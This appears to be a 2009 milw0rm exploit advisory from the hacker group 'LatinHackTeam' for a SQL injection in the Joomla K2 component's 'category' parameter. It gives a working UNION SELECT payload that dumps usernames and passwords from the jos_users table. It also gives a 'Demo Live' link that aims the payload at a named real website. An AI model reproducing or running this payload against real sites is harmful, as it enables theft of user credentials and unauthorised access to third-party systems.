46 lines
No EOL
1.5 KiB
Text
46 lines
No EOL
1.5 KiB
Text
----------------------------------------------------------------------
|
|
Joomla Component com_k2 (sectionid) SQL injection Vulnerability
|
|
----------------------------------------------------------------------
|
|
|
|
###################################################
|
|
[+] Author : Chip D3 Bi0s
|
|
[+] Email : chipdebios[alt+64]gmail.com
|
|
[+] Group : LatinHackTeam
|
|
[+] Vulnerability : SQL injection
|
|
###################################################
|
|
|
|
|
|
Information from file: mod_k2.xml
|
|
|
|
Name : K2 Module
|
|
Author : JoomlaWorks
|
|
CreationDate : April 6th, 2009
|
|
Copyright : Copyright (c) 2006-2009 JoomlaWorks Ltd. All rights reserved.
|
|
AuthorEmail : contact@joomlaworks.gr
|
|
AuthorUrl : www.joomlaworks.gr
|
|
Version : 1.0.1 Beta
|
|
License : http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL
|
|
|
|
Dowloand : http://code.google.com/p/joomlaworks/downloads/detail?name=K2-1.0.1beta2_j15_UNZIP_FIRST.zip
|
|
|
|
--------------------------------------------------------------------
|
|
|
|
|
|
Example:
|
|
|
|
http://localHost/path//index.php?option=com_k2&view=itemlist&category=<sql Code>
|
|
|
|
<Sql Code>:
|
|
null'+and+1=2+union+select+1,concat(username,0x3a,password)ChipD3Bi0s,3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users/*
|
|
|
|
|
|
Demo Live (1):
|
|
http://ajedrezmarketing.com/index.php?option=com_k2&view=itemlist&category=null'+and+1=2+union+select+1,concat(username,0x3a,password)ChipD3Bi0s,3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users/*
|
|
|
|
|
|
|
|
+++++++++++++++++++++++++++++++++
|
|
[!] Produced in South America
|
|
---------------------------------
|
|
|
|
# milw0rm.com [2009-06-29] |